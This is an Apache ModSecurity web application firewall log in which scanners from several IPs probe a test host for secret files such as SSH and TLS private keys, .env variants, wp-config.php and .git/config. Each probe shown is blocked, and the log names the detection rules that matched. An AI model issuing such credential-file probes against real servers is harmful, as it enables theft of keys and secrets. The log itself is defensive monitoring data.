[Wed Jan 15 22:36:38.597596 2025] [:error] [pid 497028] [client 213.232.87.228:32013] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Z4gqZvJeVH8YRQo4w54HCQAAAAg"]
[Wed Jan 15 22:36:38.598600 2025] [:error] [pid 497028] [client 213.232.87.228:32013] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Z4gqZvJeVH8YRQo4w54HCQAAAAg"]
[Wed Jan 15 22:36:38.599032 2025] [:error] [pid 497028] [client 213.232.87.228:32013] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Z4gqZvJeVH8YRQo4w54HCQAAAAg"]
[Wed Jan 15 22:36:38.601487 2025] [:error] [pid 483299] [client 213.232.87.228:46081] [client 213.232.87.228] ModSecurity: Warning. Matched phrase ".ssh/id_rsa" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .ssh/id_rsa found within REQUEST_FILENAME: /.ssh/id_rsa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Z4gqZlr6rimmzaD00c3PcgAAAAI"]
[Wed Jan 15 22:36:38.601966 2025] [:error] [pid 483299] [client 213.232.87.228:46081] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Z4gqZlr6rimmzaD00c3PcgAAAAI"]
[Wed Jan 15 22:36:38.602417 2025] [:error] [pid 483299] [client 213.232.87.228:46081] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Z4gqZlr6rimmzaD00c3PcgAAAAI"]
[Wed Jan 15 22:36:38.672327 2025] [:error] [pid 497000] [client 213.232.87.228:35035] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z4gqZgLOlDfhLeCVl2z0ywAAAAc"]
[Wed Jan 15 22:36:38.672628 2025] [:error] [pid 497000] [client 213.232.87.228:35035] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z4gqZgLOlDfhLeCVl2z0ywAAAAc"]
[Wed Jan 15 22:36:38.672886 2025] [:error] [pid 497000] [client 213.232.87.228:35035] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z4gqZgLOlDfhLeCVl2z0ywAAAAc"]
[Wed Jan 15 22:36:38.678941 2025] [:error] [pid 497007] [client 213.232.87.228:5777] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server.key"] [unique_id "Z4gqZj65M2iul6LoJzY8qwAAAA4"]
[Wed Jan 15 22:36:38.679168 2025] [:error] [pid 497007] [client 213.232.87.228:5777] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server.key"] [unique_id "Z4gqZj65M2iul6LoJzY8qwAAAA4"]
[Wed Jan 15 22:36:38.679310 2025] [:error] [pid 497007] [client 213.232.87.228:5777] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server.key"] [unique_id "Z4gqZj65M2iul6LoJzY8qwAAAA4"]
[Wed Jan 15 22:36:38.728142 2025] [:error] [pid 497028] [client 213.232.87.228:25453] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z4gqZvJeVH8YRQo4w54HCgAAAAg"]
[Wed Jan 15 22:36:38.728368 2025] [:error] [pid 497028] [client 213.232.87.228:25453] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z4gqZvJeVH8YRQo4w54HCgAAAAg"]
[Wed Jan 15 22:36:38.728534 2025] [:error] [pid 497028] [client 213.232.87.228:25453] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z4gqZvJeVH8YRQo4w54HCgAAAAg"]
[Thu Jan 16 00:07:05.645695 2025] [:error] [pid 498258] [client 87.120.126.158:59850] [client 87.120.126.158] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z4g_mRFblSASF-pEE-ICRgAAABg"]
[Thu Jan 16 00:07:05.646451 2025] [:error] [pid 498258] [client 87.120.126.158:59850] [client 87.120.126.158] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z4g_mRFblSASF-pEE-ICRgAAABg"]
[Thu Jan 16 00:07:05.646850 2025] [:error] [pid 498258] [client 87.120.126.158:59850] [client 87.120.126.158] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z4g_mRFblSASF-pEE-ICRgAAABg"]
[Thu Jan 16 00:07:11.522375 2025] [:error] [pid 498258] [client 87.120.126.158:59870] [client 87.120.126.158] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z4g_nxFblSASF-pEE-ICRwAAABg"]
[Thu Jan 16 00:07:11.522979 2025] [:error] [pid 498258] [client 87.120.126.158:59870] [client 87.120.126.158] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z4g_nxFblSASF-pEE-ICRwAAABg"]
[Thu Jan 16 00:07:11.523526 2025] [:error] [pid 498258] [client 87.120.126.158:59870] [client 87.120.126.158] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z4g_nxFblSASF-pEE-ICRwAAABg"]
[Thu Jan 16 00:10:52.855975 2025] [:error] [pid 498282] [client 45.148.10.86:49866] [client 45.148.10.86] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z4hAfEksRUGOI4l0aRVK2AAAAAA"]
[Thu Jan 16 00:10:52.856317 2025] [:error] [pid 498282] [client 45.148.10.86:49866] [client 45.148.10.86] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z4hAfEksRUGOI4l0aRVK2AAAAAA"]
[Thu Jan 16 00:10:52.856539 2025] [:error] [pid 498282] [client 45.148.10.86:49866] [client 45.148.10.86] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z4hAfEksRUGOI4l0aRVK2AAAAAA"]
[Thu Jan 16 22:40:37.089898 2025] [:error] [pid 514439] [client 45.148.10.69:47780] [client 45.148.10.69] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z4l81ZYkKfWElLymQx9OggAAAA0"]
[Thu Jan 16 22:40:37.090911 2025] [:error] [pid 514439] [client 45.148.10.69:47780] [client 45.148.10.69] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z4l81ZYkKfWElLymQx9OggAAAA0"]
[Thu Jan 16 22:40:37.091403 2025] [:error] [pid 514439] [client 45.148.10.69:47780] [client 45.148.10.69] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z4l81ZYkKfWElLymQx9OggAAAA0"]
[Thu Jan 16 22:40:37.287616 2025] [:error] [pid 500653] [client 45.148.10.69:47796] [client 45.148.10.69] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z4l81ZWbe3YhcT1jDQtNWQAAAAE"]
[Thu Jan 16 22:40:37.288247 2025] [:error] [pid 500653] [client 45.148.10.69:47796] [client 45.148.10.69] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z4l81ZWbe3YhcT1jDQtNWQAAAAE"]
[Thu Jan 16 22:40:37.288768 2025] [:error] [pid 500653] [client 45.148.10.69:47796] [client 45.148.10.69] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z4l81ZWbe3YhcT1jDQtNWQAAAAE"]
[Thu Jan 16 22:40:37.999062 2025] [:error] [pid 514744] [client 45.148.10.69:47810] [client 45.148.10.69] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z4l81fyZLKJkigxwGQwOoAAAAAc"]
[Thu Jan 16 22:40:37.999705 2025] [:error] [pid 514744] [client 45.148.10.69:47810] [client 45.148.10.69] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z4l81fyZLKJkigxwGQwOoAAAAAc"]
[Thu Jan 16 22:40:38.000192 2025] [:error] [pid 514744] [client 45.148.10.69:47810] [client 45.148.10.69] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z4l81fyZLKJkigxwGQwOoAAAAAc"]
[Thu Jan 16 22:40:38.193016 2025] [:error] [pid 514743] [client 45.148.10.69:47826] [client 45.148.10.69] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z4l81hVczMFbqnZjdp-NawAAAAY"]
[Thu Jan 16 22:40:38.193626 2025] [:error] [pid 514743] [client 45.148.10.69:47826] [client 45.148.10.69] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z4l81hVczMFbqnZjdp-NawAAAAY"]
[Thu Jan 16 22:40:38.194129 2025] [:error] [pid 514743] [client 45.148.10.69:47826] [client 45.148.10.69] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z4l81hVczMFbqnZjdp-NawAAAAY"]
[Thu Jan 16 22:40:38.349489 2025] [:error] [pid 514427] [client 45.148.10.69:47840] [client 45.148.10.69] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /login/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z4l81jV6NJQq9AExEzb2xwAAAAg"]
[Thu Jan 16 22:40:38.349905 2025] [:error] [pid 514427] [client 45.148.10.69:47840] [client 45.148.10.69] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z4l81jV6NJQq9AExEzb2xwAAAAg"]
[Thu Jan 16 22:40:38.350204 2025] [:error] [pid 514427] [client 45.148.10.69:47840] [client 45.148.10.69] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z4l81jV6NJQq9AExEzb2xwAAAAg"]
